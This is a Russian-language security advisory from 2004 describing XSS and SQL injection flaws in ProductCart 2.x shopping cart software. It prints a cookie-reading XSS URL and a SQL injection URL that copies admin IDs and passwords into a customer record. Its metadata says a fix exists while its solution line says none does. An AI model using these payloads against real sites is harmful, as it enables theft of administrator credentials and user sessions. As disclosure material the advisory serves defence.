Дата публикации: | 19.02.2004 |
Всего просмотров: | 2039 |
Опасность: | Средняя |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Обход ограничений безопасности |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | ProductCart 2.x |
Уязвимые версии: ProductCart
Описание: Несколько уязвимостей обнаружено в ProductCart. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение. 1. XSS: http://[target]/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.c ookie)</script><"2. SQL инъекция: http://www.shop.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0& priceUntil=999;u--pdate%20customers%20set%20name=(s--elect%20top%201%20idadmin%20from%20admins),lastN ame=(s--elect%20top%01%20adminpassword%20from%20admins ),phone=(s--elect%20password%20from%20customers%20where%20zip=987654)%20where%20zip=987654;s--elect%2 0*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBr and=0&resultCnt=200&Submit.x=33& URL производителя:http://www.earlyimpact.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | EarlyImpact ProductCart shopping cart software multiple security |